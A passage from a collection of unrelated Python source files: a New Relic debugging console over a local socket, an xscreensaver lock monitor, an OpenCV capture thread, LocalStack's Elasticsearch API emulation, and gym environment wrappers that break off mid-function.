listener.bind(self.__listener_socket)
atexit.register(self.__socket_cleanup, self.__listener_socket)
os.chmod(self.__listener_socket, 0o600)
listener.listen(5)
while True:
client, addr = listener.accept()
if not self.__console_initialized:
self.__console_initialized = True
intercept_console()
shell = ConsoleShell()
shell.stdin = client.makefile('r')
shell.stdout = client.makefile('w')
while True:
try:
shell.cmdloop()
except Exception:
shell.stdout.flush()
print('Unexpected exception.', file=shell.stdout)
exc_info = sys.exc_info()
traceback.print_exception(exc_info[0], exc_info[1],
exc_info[2], file=shell.stdout)
exc_info = None
else:
break
shell.stdin = None
shell.stdout = None
del shell
client.close()
class ClientShell(cmd.Cmd):
prompt = '(newrelic) '
def __init__(self, config_file, stdin=None, stdout=None, log=None):
cmd.Cmd.__init__(self, stdin=stdin, stdout=stdout)
self.__config_file = config_file
self.__config_object = ConfigParser.RawConfigParser()
self.__log_object = log
if not self.__config_object.read([config_file]):
raise RuntimeError('Unable to open configuration file %s.' %
config_file)
listener_socket = self.__config_object.get('newrelic',
'console.listener_socket') % {'pid': '*'}
if os.path.isabs(listener_socket):
self.__servers = [(socket.AF_UNIX, path) for path in
sorted(glob.glob(listener_socket))]
else:
host, port = listener_socket.split(':')
port = int(port)
self.__servers = [(socket.AF_INET, (host, port))]
def emptyline(self):
pass
def help_help(self):
print("""help (command)
Output list of commands or help details for named command.""",
file=self.stdout)
def do_exit(self, line):
"""exit
Exit the client shell."""
return True
def do_servers(self, line):
"""servers
Display a list of the servers which can be connected to."""
for i in range(len(self.__servers)):
print('%s: %s' % (i+1, self.__servers[i]), file=self.stdout)
def do_connect(self, line):
"""connect [index]
Connect to the server from the servers lift with given index. If
there is only one server then the index position does not need to
be supplied."""
if len(self.__servers) == 0:
print('No servers to connect to.', file=self.stdout)
return
if not line:
if len(self.__servers) != 1:
print('Multiple servers, which should be used?',
file=self.stdout)
return
else:
line = '1'
try:
selection = int(line)
except Exception:
selection = None
if selection is None:
print('Server selection not an integer.', file=self.stdout)
return
if selection <= 0 or selection > len(self.__servers):
print('Invalid server selected.', file=self.stdout)
return
server = self.__servers[selection-1]
client = socket.socket(server[0], socket.SOCK_STREAM)
client.connect(server[1])
def write():
while 1:
try:
c = sys.stdin.read(1)
if not c:
client.shutdown(socket.SHUT_RD)
break
if self.__log_object:
self.__log_object.write(c)
client.sendall(c.encode('utf-8'))
except Exception:
break
def read():
while 1:
try:
c = client.recv(1).decode('utf-8')
if not c:
break
if self.__log_object:
self.__log_object.write(c)
sys.stdout.write(c)
sys.stdout.flush()
except Exception:
break
thread1 = threading.Thread(target=write)
thread1.setDaemon(True)
thread2 = threading.Thread(target=read)
thread2.setDaemon(True)
thread1.start()
thread2.start()
thread2.join()
return True
def main():
if len(sys.argv) == 1:
print("Usage: newrelic-console config_file")
sys.exit(1)
shell = ClientShell(sys.argv[1])
shell.cmdloop()
if __name__ == '__main__':
main()
|
LockMonitor.py
|
# Copyright (c) 2012, Jeff Melville
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import subprocess
import threading
class LockMonitor:
def __init__(self, dispatcher, parent=None):
self.screen_locked = False
self.monitoring = False
self.dispatcher = dispatcher
#self.dispatcher.update_locked(self.get_status(), initial=True)
self.dispatcher.update_locked(False)
self.proc = None
self.running = False
def get_status(self):
return self.screen_locked
def monitor(self):
if self.proc: self.shutdown()
self.proc = subprocess.Popen("xscreensaver-command -watch",shell=True, stdout=subprocess.PIPE)
self.proc_reader = threading.Thread(target=self.run)
self.running = True
self.proc_reader.start()
def shutdown(self):
#TODO: Not sure this will terminate correctly
if self.proc: self.proc.terminate()
self.running = False
self.proc = None
def run(self):
for line in iter(self.proc.stdout.readline,''):
if "UNBLANK" in line:
self.screen_locked = False
elif "LOCK" in line:
self.screen_locked = True
else:
continue
self.dispatcher.update_locked(self.screen_locked)
|
capture.py
|
from threading import Thread
import cv2
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src,cv2.CAP_GSTREAMER)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, self.frame) = self.stream.read()
def stop(self):
self.stopped = True
self.stream.release()
|
es_api.py
|
"""
Serve the elasticsearch API as a threaded Flask app.
"""
import json
import logging
import threading
import time
from random import randint
from typing import Dict, Optional
from flask import Flask, jsonify, make_response, request
from localstack import config, constants
from localstack.constants import TEST_AWS_ACCOUNT_ID
from localstack.services import generic_proxy
from localstack.services.es import versions
from localstack.services.es.cluster import ProxiedElasticsearchCluster
from localstack.services.generic_proxy import RegionBackend
from localstack.utils import persistence
from localstack.utils.analytics import event_publisher
from localstack.utils.aws import aws_stack
from localstack.utils.common import get_service_protocol, poll_condition, start_thread, to_str
from localstack.utils.tagging import TaggingService
LOG = logging.getLogger(__name__)
APP_NAME = "es_api"
API_PREFIX = "/2015-01-01"
DEFAULT_ES_VERSION = "7.10"
DEFAULT_ES_CLUSTER_CONFIG = {
"InstanceType": "m3.medium.elasticsearch",
"InstanceCount": 1,
"DedicatedMasterEnabled": True,
"ZoneAwarenessEnabled": False,
"DedicatedMasterType": "m3.medium.elasticsearch",
"DedicatedMasterCount": 1,
}
# timeout in seconds when giving up on waiting for the cluster to start
CLUSTER_STARTUP_TIMEOUT = 600
# ideally, each domain gets its own cluster. to save resources, we currently re-use the same
# cluster instance. this also means we lie to the client about the the elasticsearch domain
# version. the first call to create_domain with a specific version will create the cluster
# with that version. subsequent calls will believe they created a cluster with the version
# they specified.
_cluster: Optional[ProxiedElasticsearchCluster] = None
# mutex for modifying domains
_domain_mutex = threading.Lock()
app = Flask(APP_NAME)
app.url_map.strict_slashes = False
class ElasticsearchServiceBackend(RegionBackend):
# maps cluster names to cluster details
es_clusters: Dict[str, ProxiedElasticsearchCluster]
# storage for domain resources (access should be protected with the _domain_mutex)
es_domains: Dict[str, Dict]
# static tagging service instance
TAGS = TaggingService()
def __init__(self):
self.es_clusters = {}
self.es_domains = {}
def _run_cluster_startup_monitor(cluster):
region = ElasticsearchServiceBackend.get()
LOG.debug("running cluster startup monitor for cluster %s", cluster)
# wait until the cluster is started, or the timeout is reached
status = poll_condition(cluster.is_up, timeout=CLUSTER_STARTUP_TIMEOUT, interval=5)
LOG.debug("cluster state polling returned! status = %s", status)
with _domain_mutex:
LOG.debug("iterating over cluster domains %s", region.es_clusters.keys())
for domain, domain_cluster in region.es_clusters.items():
LOG.debug("checking cluster for domain %s", domain)
if cluster is domain_cluster:
if domain in region.es_domains:
region.es_domains[domain]["Created"] = status
def _create_cluster(domain_name, data):
"""
Create a new entry in ES_DOMAINS if the domain does not yet exist. Start a ElasticsearchCluster if this is the first
domain being created. NOT thread safe, needs to be called around _domain_mutex.
"""
global _cluster
region = ElasticsearchServiceBackend.get()
if _cluster:
# see comment on _cluster
LOG.info("elasticsearch cluster already created, using existing one for %s", domain_name)
region.es_clusters[domain_name] = _cluster
data["Created"] = _cluster.is_up()
return
# creating cluster for the first time
version = versions.get_install_version(data.get("ElasticsearchVersion") or DEFAULT_ES_VERSION)
_cluster = ProxiedElasticsearchCluster(
port=config.PORT_ELASTICSEARCH, host=constants.LOCALHOST, version=version
)
def _start_async(*_):
LOG.info("starting %s on %s:%s", type(_cluster), _cluster.host, _cluster.port)
_cluster.start() # start may block during install
start_thread(_start_async)
region.es_clusters[domain_name] = _cluster
# run a background thread that will update all domains that use this cluster to set
# data['Created'] = <status> once it is started, or the CLUSTER_STARTUP_TIMEOUT is reached
# FIXME: if the cluster doesn't start, these threads will stay open until the timeout is
# reached, even if the cluster is already shut down. we could fix this with an additional
# event, or a timer instead of Poll, but it seems like a rare case in the first place.
threading.Thread(target=_run_cluster_startup_monitor, daemon=True, args=(_cluster,)).start()
def _cleanup_cluster(domain_name):
global _cluster
region = ElasticsearchServiceBackend.get()
cluster = region.es_clusters.pop(domain_name)
LOG.debug(
"cleanup cluster for domain %s, %d domains remaining", domain_name, len(region.es_clusters)
)
if not region.es_clusters:
# because cluster is currently always mapped to _cluster, we only shut it down if no other
# domains are using it
LOG.info("shutting down elasticsearch cluster after domain %s cleanup", domain_name)
cluster.shutdown()
# FIXME: if delete_domain() is called, then immediately after, create_domain() (without
# letting time pass for the proxy to shut down) there's a chance that there will be a bind
# exception when trying to start the proxy again (which is currently always bound to
# PORT_ELASTICSEARCH)
_cluster = None
def error_response(error_type, code=400, message="Unknown error."):
if not message:
if error_type == "ResourceNotFoundException":
message = "Resource not found."
elif error_type == "ResourceAlreadyExistsException":
message = "Resource already exists."
response = make_response(jsonify({"error": message}))
response.headers["x-amzn-errortype"] = error_type
return response, code
def get_domain_config_status():
return {
"CreationDate": "%.2f" % time.time(),
"PendingDeletion": False,
"State": "Active",
"UpdateDate": "%.2f" % time.time(),
"UpdateVersion": randint(1, 100),
}
def get_domain_config(domain_name):
region = ElasticsearchServiceBackend.get()
status = region.es_domains.get(domain_name) or {}
cluster_cfg = status.get("ElasticsearchClusterConfig") or {}
default_cfg = DEFAULT_ES_CLUSTER_CONFIG
config_status = get_domain_config_status()
return {
"DomainConfig": {
"AccessPolicies": {
"Options": '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::%s:root"},"Action":"es:*","Resource":"arn:aws:es:%s:%s:domain/%s/*"}]}'
% (
TEST_AWS_ACCOUNT_ID,
aws_stack.get_region(),
TEST_AWS_ACCOUNT_ID,
domain_name,
), # noqa: E501
"Status": config_status,
},
"AdvancedOptions": {
"Options": {
"indices.fielddata.cache.size": "",
"rest.action.multi.allow_explicit_index": "true",
},
"Status": config_status,
},
"EBSOptions": {
"Options": {
"EBSEnabled": True,
"EncryptionEnabled": False,
"Iops": 0,
"VolumeSize": 10,
"VolumeType": "gp2",
},
"Status": config_status,
},
"ElasticsearchClusterConfig": {
"Options": {
"DedicatedMasterCount": cluster_cfg.get(
"DedicatedMasterCount", default_cfg["DedicatedMasterCount"]
),
"DedicatedMasterEnabled": cluster_cfg.get(
"DedicatedMasterEnabled", default_cfg["DedicatedMasterEnabled"]
),
"DedicatedMasterType": cluster_cfg.get(
"DedicatedMasterType", default_cfg["DedicatedMasterType"]
),
"InstanceCount": cluster_cfg.get("InstanceCount", default_cfg["InstanceCount"]),
"InstanceType": cluster_cfg.get("InstanceType", default_cfg["InstanceType"]),
"ZoneAwarenessEnabled": cluster_cfg.get(
"ZoneAwarenessEnabled", default_cfg["ZoneAwarenessEnabled"]
),
},
"Status": config_status,
},
"CognitoOptions": {"Enabled": False},
"ElasticsearchVersion": {"Options": "5.3", "Status": config_status},
"EncryptionAtRestOptions": {
"Options": {"Enabled": False, "KmsKeyId": ""},
"Status": config_status,
},
"LogPublishingOptions": {
"Options": {
"INDEX_SLOW_LOGS": {
"CloudWatchLogsLogGroupArn": "arn:aws:logs:%s:%s:log-group:sample-domain"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID), # noqa: E501
"Enabled": False,
},
"SEARCH_SLOW_LOGS": {
"CloudWatchLogsLogGroupArn": "arn:aws:logs:%s:%s:log-group:sample-domain"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID), # noqa: E501
"Enabled": False,
},
},
"Status": config_status,
},
"SnapshotOptions": {
"Options": {"AutomatedSnapshotStartHour": randint(0, 23)},
"Status": config_status,
},
"VPCOptions": {
"Options": {
"AvailabilityZones": ["us-east-1b"],
"SecurityGroupIds": ["sg-12345678"],
"SubnetIds": ["subnet-12345678"],
"VPCId": "vpc-12345678",
},
"Status": config_status,
},
}
}
def get_domain_status(domain_name, deleted=False):
region = ElasticsearchServiceBackend.get()
status = region.es_domains.get(domain_name) or {}
cluster_cfg = status.get("ElasticsearchClusterConfig") or {}
default_cfg = DEFAULT_ES_CLUSTER_CONFIG
endpoint = "%s://%s:%s" % (
get_service_protocol(),
config.HOSTNAME_EXTERNAL,
config.PORT_ELASTICSEARCH,
)
return {
"DomainStatus": {
"ARN": "arn:aws:es:%s:%s:domain/%s"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID, domain_name),
"Created": status.get("Created", False),
"Deleted": deleted,
"DomainId": "%s/%s" % (TEST_AWS_ACCOUNT_ID, domain_name),
"DomainName": domain_name,
"ElasticsearchClusterConfig": {
"DedicatedMasterCount": cluster_cfg.get(
"DedicatedMasterCount", default_cfg["DedicatedMasterCount"]
),
"DedicatedMasterEnabled": cluster_cfg.get(
"DedicatedMasterEnabled", default_cfg["DedicatedMasterEnabled"]
),
"DedicatedMasterType": cluster_cfg.get(
"DedicatedMasterType", default_cfg["DedicatedMasterType"]
),
"InstanceCount": cluster_cfg.get("InstanceCount", default_cfg["InstanceCount"]),
"InstanceType": cluster_cfg.get("InstanceType", default_cfg["InstanceType"]),
"ZoneAwarenessEnabled": cluster_cfg.get(
"ZoneAwarenessEnabled", default_cfg["ZoneAwarenessEnabled"]
),
},
"ElasticsearchVersion": status.get("ElasticsearchVersion") or DEFAULT_ES_VERSION,
"Endpoint": endpoint,
"Processing": False,
"EBSOptions": {
"EBSEnabled": True,
"VolumeType": "gp2",
"VolumeSize": 10,
"Iops": 0,
},
"CognitoOptions": {"Enabled": False},
}
}
@app.route("%s/domain" % API_PREFIX, methods=["GET"])
def list_domain_names():
region = ElasticsearchServiceBackend.get()
result = {"DomainNames": [{"DomainName": name} for name in region.es_domains.keys()]}
return jsonify(result)
@app.route("%s/es/domain" % API_PREFIX, methods=["POST"])
def create_domain():
region = ElasticsearchServiceBackend.get()
data = json.loads(to_str(request.data))
domain_name = data["DomainName"]
with _domain_mutex:
if domain_name in region.es_domains:
# domain already created
return error_response(error_type="ResourceAlreadyExistsException")
# "create" domain data
region.es_domains[domain_name] = data
# lazy-init the cluster, and set the data["Created"] flag
_create_cluster(domain_name, data)
# create result document
result = get_domain_status(domain_name)
# record event
event_publisher.fire_event(
event_publisher.EVENT_ES_CREATE_DOMAIN,
payload={"n": event_publisher.get_hash(domain_name)},
)
persistence.record("es", request=request)
return jsonify(result)
@app.route("%s/es/domain/<domain_name>" % API_PREFIX, methods=["GET"])
def describe_domain(domain_name):
region = ElasticsearchServiceBackend.get()
with _domain_mutex:
if domain_name not in region.es_domains:
return error_response(error_type="ResourceNotFoundException")
result = get_domain_status(domain_name)
return jsonify(result)
@app.route("%s/es/domain-info" % API_PREFIX, methods=["POST"])
def describe_domains():
region = ElasticsearchServiceBackend.get()
data = json.loads(to_str(request.data))
result = []
domain_names = data.get("DomainNames", [])
with _domain_mutex:
for domain_name in region.es_domains:
if domain_name in domain_names:
status = get_domain_status(domain_name)
status = status.get("DomainStatus") or status
result.append(status)
result = {"DomainStatusList": result}
return jsonify(result)
@app.route("%s/es/domain/<domain_name>/config" % API_PREFIX, methods=["GET", "POST"])
def domain_config(domain_name):
with _domain_mutex:
doc = get_domain_config(domain_name)
return jsonify(doc)
@app.route("%s/es/domain/<domain_name>" % API_PREFIX, methods=["DELETE"])
def delete_domain(domain_name):
region = ElasticsearchServiceBackend.get()
with _domain_mutex:
if domain_name not in region.es_domains:
return error_response(error_type="ResourceNotFoundException")
result = get_domain_status(domain_name, deleted=True)
del region.es_domains[domain_name]
_cleanup_cluster(domain_name)
# record event
event_publisher.fire_event(
event_publisher.EVENT_ES_DELETE_DOMAIN,
payload={"n": event_publisher.get_hash(domain_name)},
)
persistence.record("es", request=request)
return jsonify(result)
@app.route("%s/es/versions" % API_PREFIX, methods=["GET"])
def list_es_versions():
result = []
for key in versions.install_versions.keys():
result.append(key)
return jsonify({"ElasticsearchVersions": result})
@app.route("%s/es/compatibleVersions" % API_PREFIX, methods=["GET"])
def get_compatible_versions():
result = [
{"SourceVersion": "7.10", "TargetVersions": []},
{"SourceVersion": "7.9", "TargetVersions": ["7.10"]},
{"SourceVersion": "7.8", "TargetVersions": ["7.9", "7.10"]},
{"SourceVersion": "7.7", "TargetVersions": ["7.8", "7.9", "7.10"]},
{"SourceVersion": "7.4", "TargetVersions": ["7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "7.1", "TargetVersions": ["7.4", "7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "6.8", "TargetVersions": ["7.1", "7.4", "7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "6.7", "TargetVersions": ["6.8"]},
{"SourceVersion": "6.5", "TargetVersions": ["6.7", "6.8"]},
{"SourceVersion": "6.4", "TargetVersions": ["6.5", "6.7", "6.8"]},
{"SourceVersion": "6.3", "TargetVersions": ["6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "6.2", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "6.0", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "5.6", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "5.5", "TargetVersions": ["5.6"]},
{"SourceVersion": "5.3", "TargetVersions": ["5.6"]},
{"SourceVersion": "5.1", "TargetVersions": ["5.6"]},
]
return jsonify({"CompatibleElasticsearchVersions": result})
@app.route("%s/tags" % API_PREFIX, methods=["GET", "POST"])
def add_list_tags():
if request.method == "POST":
data = json.loads(to_str(request.data) or "{}")
arn = data.get("ARN")
ElasticsearchServiceBackend.TAGS.tag_resource(arn, data.get("TagList", []))
if request.method == "GET" and request.args.get("arn"):
arn = request.args.get("arn")
tags = ElasticsearchServiceBackend.TAGS.list_tags_for_resource(arn)
response = {"TagList": tags.get("Tags")}
return jsonify(response)
return jsonify({})
def serve(port, quiet=True):
generic_proxy.serve_flask_app(app=app, port=port)
|
env_wrappers.py
|
"""Env wrappers
Most common wrappers can be checked from following links for usage:
`https://pypi.org/project/gym-vec-env`
`https://github.com/openai/baselines/blob/master/baselines/common/*wrappers.py`
"""
from collections import deque
from functools import partial
from multiprocessing import Pipe, Process, cpu_count
from sys import platform
import numpy as np
import cv2
import gym
from gym import spaces
from gym.wrappers import FlattenDictWrapper
from env_list import get_envlist
__all__ = (
'build_env', # build env
'TimeLimit', # Time limit wrapper
'NoopResetEnv', # Run random number of no-ops on reset
'FireResetEnv', # Reset wrapper for envs with fire action
'EpisodicLifeEnv', # end-of-life == end-of-episode wrapper
'MaxAndSkipEnv', # skip frame wrapper
'ClipRewardEnv', # clip reward wrapper
'WarpFrame', # warp observation wrapper
'FrameStack', # stack frame wrapper
'LazyFrames', # lazy store wrapper
'RewardShaping', # reward shaping
'SubprocVecEnv', # vectorized env wrapper
'VecFrameStack', # stack frames in vectorized env
'Monitor', # Episode reward and length monitor
'NormalizedActions', # normalized action to actual space
'DmObsTrans', # translate observations in dm_control environments
)
cv2.ocl.setUseOpenCL(False)
def build_env(env_id, env_type, vectorized=False,
seed=0, reward_shaping=None, nenv=1, **kwargs):
"""Build env based on options
Args:
env_id (str): environment id
env_type (str): atari, classic_control, box2d
vectorized (bool): whether sampling parrallel
seed (int): random seed for env
reward_shaping (callable): callable function for reward shaping
nenv (int): how many processes will be used in sampling
kwargs (dict):
max_episode_steps (int): the maximum episode steps
"""
nenv = nenv or cpu_count() // (1 + (platform == 'darwin'))
stack = env_type == 'atari'
if nenv > 1:
if vectorized:
env = _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, stack, **kwargs)
else:
env = []
for _ in range(nenv):
single_env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
env.append(single_env) # get env as a list of same single env
else:
env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
return env
def check_name_in_list(env_id, env_type):
""" Check if env_id exists in the env_type list """
env_list = get_envlist(env_type)
if env_id not in env_list:
print('Env ID {:s} Not Found In {:s}!'.format(env_id, env_type))
else:
print('Env ID {:s} Exists!'.format(env_id))
def _make_env(env_id, env_type, seed, reward_shaping, frame_stack, **kwargs):
"""Make single env"""
check_name_in_list(env_id, env_type) # check existence of env_id in env_type
if env_type == 'atari':
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
env = Monitor(env)
# deepmind wrap
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
elif env_type in ['classic_control', 'box2d', 'mujoco']:
env = gym.make(env_id).unwrapped
max_episode_steps = kwargs.get('max_episode_steps')
if max_episode_steps is not None:
env = TimeLimit(env.unwrapped, max_episode_steps)
env = Monitor(env)
elif env_type == 'robotics':
env = gym.make(env_id)
env = FlattenDictWrapper(env, ['observation', 'desired_goal'])
env = Monitor(env, info_keywords=('is_success',))
elif env_type == 'dm_control':
env = gym.make('dm2gym:' + env_id, environment_kwargs={'flat_observation': True})
env = DmObsTrans(env)
elif env_type == 'rlbench':
from common.build_rlbench_env import RLBenchEnv
env = RLBenchEnv(env_id)
else:
raise NotImplementedError
if reward_shaping is not None:
if callable(reward_shaping):
env = RewardShaping(env, reward_shaping)
else:
raise ValueError('reward_shaping parameter must be callable')
env.seed(seed)
return env
def _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, frame_stack, **kwargs):
"""Make vectorized env"""
env = SubprocVecEnv([partial(
_make_env, env_id, env_type, seed + i, reward_shaping, False, **kwargs
) for i in range(nenv)])
if frame_stack:
env = VecFrameStack(env, 4)
return env
class DmObsTrans(gym.Wrapper):
""" Observation process for DeepMind Control Suite environments """
def __init__(self, env):
self.env = env
super(DmObsTrans, self).__init__(env)
self.__need_trans = False
if isinstance(self.observation_space, gym.spaces.dict.Dict):
self.observation_space = self.observation_space['observations']
self.__need_trans = True
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
if self.__need_trans:
observation = observation['observations']
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
if self.__need_trans:
observation = observation['observations']
return observation
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
self.env = env
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
super(NoopResetEnv, self).__init__(env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
super(FireResetEnv, self).__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
super(EpisodicLifeEnv, self).__init__(env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames so it's important to keep lives > 0, so that we only reset
# once the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
super(MaxAndSkipEnv, self).__init__(env)
# most recent raw observations (for max pooling across time steps)
shape = (2,) + env.observation_space.shape
self._obs_buffer = np.zeros(shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = info = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2:
self._obs_buffer[0] = obs
if i == self._skip - 1:
self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
super(ClipRewardEnv, self).__init__(env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
super(WarpFrame, self).__init__(env)
self.width = width
self.height = height
self.grayscale = grayscale
shape = (self.height, self.width, 1 if self.grayscale else 3)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
def observation(self, frame):
if self.grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
size = (self.width, self.height)
frame = cv2.resize(frame, size, interpolation=cv2.INTER_AREA)
if self.grayscale:
frame = np.expand_dims(frame, -1)
return frame
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also `LazyFrames`
"""
super(FrameStack, self).__init__(env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can be
huge for DQN's 1M frames replay buffers.
This object should only be converted to numpy array before being passed
to the model. You'd not believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
class RewardShaping(gym.RewardWrapper):
"""Shaping the reward
For reward scale, func can be `lambda r: r * scale`
"""
def __init__(self, env, func):
super(RewardShaping, self).__init__(env)
self.func = func
def reward(self, reward):
return self.func(reward)
class VecFrameStack(object):
def __init__(self, env, k):
self.env = env
self.k = k
self.action_space = env.action_space
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
